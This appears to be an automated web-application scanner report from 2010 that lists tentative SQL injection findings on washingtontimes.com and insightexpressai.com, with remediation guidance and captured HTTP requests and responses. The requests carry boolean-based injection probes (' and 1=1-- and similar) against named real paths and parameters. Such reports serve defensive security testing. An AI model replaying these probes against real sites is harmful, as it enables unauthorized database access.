SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The esi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Date: Mon, 13 Dec 2010 21:23:28 GMT Connection: close Cache-Control: no-store Content-Length: 19553
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
1.2. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://core.insightexpressai.com
Path:
/adServer/GetInvite2.aspx
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Date: Mon, 13 Dec 2010 21:23:56 GMT Connection: close Cache-Control: no-store Content-Length: 19569
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
The referer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the referer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Date: Mon, 13 Dec 2010 21:23:35 GMT Connection: close Cache-Control: no-store Content-Length: 19555
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
1.4. http://www.washingtontimes.com/&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 15160 Date: Mon, 13 Dec 2010 21:21:59 GMT X-Varnish: 570568454 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></scri ...[SNIP]...
Request 2
GET /&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 15190 Date: Mon, 13 Dec 2010 21:21:59 GMT X-Varnish: 570568468 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form= ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture'%20and%201%3d1--%20/gift-guide/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14738 Date: Mon, 13 Dec 2010 21:34:36 GMT X-Varnish: 570585415 Age: 0 Via: 1.1 varnish Connection: close
GET /culture'%20and%201%3d2--%20/gift-guide/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14714 Date: Mon, 13 Dec 2010 21:34:37 GMT X-Varnish: 570585632 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand? ...[SNIP]...
1.6. http://www.washingtontimes.com/culture/gift-guide/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/culture/gift-guide/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture/gift-guide/?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 42707 Date: Mon, 13 Dec 2010 21:33:14 GMT X-Varnish: 570583642 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Holiday Gi ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /culture/gift-guide/?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 42868 Date: Mon, 13 Dec 2010 21:33:15 GMT X-Varnish: 570583683 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Holiday Gi ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="t ...[SNIP]...
1.7. http://www.washingtontimes.com/culture/travel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/culture/travel/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture/travel/?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 45663 Date: Mon, 13 Dec 2010 21:32:16 GMT X-Varnish: 570582153 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Washington ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /culture/travel/?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 45848 Date: Mon, 13 Dec 2010 21:32:18 GMT X-Varnish: 570582406 Age: 0 Via: 1.1 varnish Connection: close
1.8. http://www.washingtontimes.com/multimedia/collection/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/multimedia/collection/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20254755%20or%201%3d1--%20 and 20254755%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/?120254755%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 24116 Date: Mon, 13 Dec 2010 21:33:35 GMT X-Varnish: 570583901 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
Multi ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /multimedia/collection/?120254755%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 24277 Date: Mon, 13 Dec 2010 21:33:36 GMT X-Varnish: 570584146 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
Multi ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="t ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia'%20and%201%3d1--%20/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14554 Date: Mon, 13 Dec 2010 21:37:30 GMT X-Varnish: 570589802 Age: 0 Via: 1.1 varnish Connection: close
